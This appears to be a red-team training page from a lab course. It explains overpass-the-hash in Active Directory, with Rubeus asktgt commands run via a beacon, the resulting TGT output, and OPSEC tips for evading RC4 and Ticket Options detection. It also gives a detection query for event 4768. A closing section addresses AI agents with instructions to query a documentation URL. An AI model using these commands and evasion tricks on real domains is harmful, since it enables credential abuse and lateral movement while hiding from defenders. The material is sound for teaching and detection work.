# Overpass the Hash

Overpass the hash is a technique which allows us to request a Kerberos TGT for a user, using their NTLM or AES hash. Elevated privileges are required to obtain user hashes, but not to actually request a ticket.

Rubeus `asktgt` has us covered for this task.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 59fc0f884922b4ce376051134c71e22c
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\jking'
[*] Using domain controller: 10.10.122.10:88

[09/01 10:24:04] [+] received output:
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFmj [...snip...] 5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  jking
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/1/2022 2:23:59 PM
  EndTime                  :  9/2/2022 12:23:59 AM
  RenewTill                :  9/8/2022 2:23:59 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  NytFQCt4OMyeF+BjfPSrbw==
  ASREP (key)              :  59FC0F884922B4CE376051134C71E22C
```

\\

This TGT can then be leveraged via Pass the Ticket.

\\

**OPSEC**\
\
Using an NTLM hash results in a ticket encrypted using RC4 (0x17). This is considered a legacy encryption type and therefore often stands out as anomalous in a modern Windows environment. The "RC4 TGTs" saved search will show all 4768 events where the ticket encryption type is 0x17. It's very likely that the only result there will be the one generated from the above command.

\\

To obtain a TGT encrypted using AES256 (0x12), you guessed it, use the user's AES256 hash instead.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: 4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\jking'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFuj [...snip...] ljLmlv

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  jking
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/1/2022 2:54:36 PM
  EndTime                  :  9/2/2022 12:54:36 AM
  RenewTill                :  9/8/2022 2:54:36 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  BBLSeA9nnaNeYIcHqf787V0m5Znz1ednGMXh9V9aorE=
  ASREP (key)              :  4A8A74DAAD837AE09E9ECC8C2F1B89F960188CB934DB6D4BBEBADE8318AE57C6
```

\\

You can find the corresponding 4768 event with this query:

```
event.code: 4768 and winlog.event_data.TicketEncryptionType: 0x12 and winlog.event_data.TargetUserName: jking
```

\\

It will be practically undistinguishable from the other TGT requests, with the exception of two fields:

1. The Supplied Realm Name will be dev.cyberbotic.io, instead of DEV.
2. The Ticket Options will be 0x40800010 instead of 0x40810010.

\\

The asktgt command has two optional parameters that we can use to blend in a bit more.

If no `/domain` is specified, Rubeus uses the FQDN of the domain this computer is in. Instead, we can force it to use the NetBIOS name with `/domain:DEV`. There is also an `/opsec` flag which tells Rubeus to request the TGT in such a way that results in the Ticket Options being 0x40810010.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /domain:DEV /opsec /nowrap
```

\\

**More OPSEC**\
\
Mimikatz can also perform overpass the hash, but in a way that writes into LSASS. Rubeus' method doesn't touch LSASS but it does generate Kerberos traffic from an anomalous process, as this usually only occurs from LSASS. These can be seen using the "Kerberos Traffic from Suspicious Process" saved search.\
\
The bottom line is that you have to "pick your poison".


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yamortsa.gitbook.io/rto/user-impersonation/overpass-the-hash.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.